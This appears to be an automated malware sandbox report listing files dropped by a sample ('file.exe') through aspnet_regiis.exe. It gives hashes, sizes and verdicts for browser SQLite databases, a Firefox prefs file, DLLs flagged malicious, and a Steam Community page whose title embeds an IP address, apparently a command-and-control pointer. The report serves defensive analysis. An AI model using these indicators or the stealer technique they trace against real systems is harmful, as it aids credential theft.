                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10237
                                                                                                                                                                  Entropy (8bit):5.498288591230544
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                  MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                  SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                  SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                  SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                  Entropy (8bit):2.8150724101159437
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:+MEM:+BM
                                                                                                                                                                  MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                                                                  SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                                                                  SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                                                                  SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Unknown error
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):685392
                                                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):42
                                                                                                                                                                  Entropy (8bit):4.0050635535766075
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                  MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                  SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                  SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                  SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                  Entropy (8bit):2.8150724101159437
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:+MEM:+BM
                                                                                                                                                                  MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                                                                  SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                                                                  SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                                                                  SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Unknown error
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34879
                                                                                                                                                                  Entropy (8bit):5.398984021038028
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2q:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtP+
                                                                                                                                                                  MD5:CB474CD24A9B82E2E77E067A1FC97F31
                                                                                                                                                                  SHA1:DDF7609BAAF037C4B074BA9193FE8E0D2EC9CFDE
                                                                                                                                                                  SHA-256:AD200D9A054496C714D8BB623D97B9249FB6A26892A420BC18BE35A0643C5DEF
                                                                                                                                                                  SHA-512:61218F8A37D6541D2CABC95253987F2BCE95AF567B3DC29B0465BA523F8F2B46A9FAC3C9576AFD77A09F27C77A2EC959C5742A8634D4AE9F2C00F9E422E9E977
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1048575
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1f/:F
                                                                                                                                                                  MD5:52EEA21AFDC1FA07894225ED9536D245
                                                                                                                                                                  SHA1:9F0EDB171DBF05A67ADEDA2C3FF1768D5066F9BE
                                                                                                                                                                  SHA-256:3A36D5B3161D3A27AE6D1390D5D959786DADF6860882022745B1F73190D04E9C
                                                                                                                                                                  SHA-512:EC45901B1BCB35F2B166C519EE6F7C072D46C13D94327415AC316E16DDB552C1CBCA807827132F0167D121ED762CB6364AC19BCCC2699A6D033A3B57929E7A69
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):594944
                                                                                                                                                                  Entropy (8bit):6.950278574609064
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:/JnGC1gieh7IGqNOIf/eDWeYUZ2q/MtTTwBfJA/gMdOPapZ5n1kM9KwdTVORr:2ieVqotaCsq/0TTMGHdKM9KwdTV4r
                                                                                                                                                                  MD5:D135B1643ABA57454EF94C7F29C3B178
                                                                                                                                                                  SHA1:3157D4150C3562E95D93A61C9CCE0F1DCEB7DEBC
                                                                                                                                                                  SHA-256:8BE5CF1CFED0A9F6EAF4C978511461AD39ED8A53DC1D8BE5C97990418B84B906
                                                                                                                                                                  SHA-512:45177DAA16018D6C2989963A6CDEB59B4CF037674B2F8BFAA85CB332A9A6AF291581E04880D2156C65D14760C5A3ED02BAF3DE340C31441F668DB028BBAA07C3
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                  Entropy (8bit):4.465913296824278
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:azZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:8ZHtBZWOKnMM6bFpZj4
                                                                                                                                                                  MD5:42BB7FF98BBC2C64A335A176D4A9F29E
                                                                                                                                                                  SHA1:823280E15AC96A74D8C00F4EDD4DD5810C55E142
                                                                                                                                                                  SHA-256:77F0CC2EC51F713BA2B5509823E3D60002AE85394D786B3F021FD5D07840DBA7
                                                                                                                                                                  SHA-512:B024AE441BEA17F4927169EEC1356EE52E7AACC8189B2FC99D2BCB7E6058CA50051D7C53A9CAE8CD661B92D6FBC654953BDDF4EA3A115CA5046FA66E5F3614AE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Entropy (8bit):7.891145170897587
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
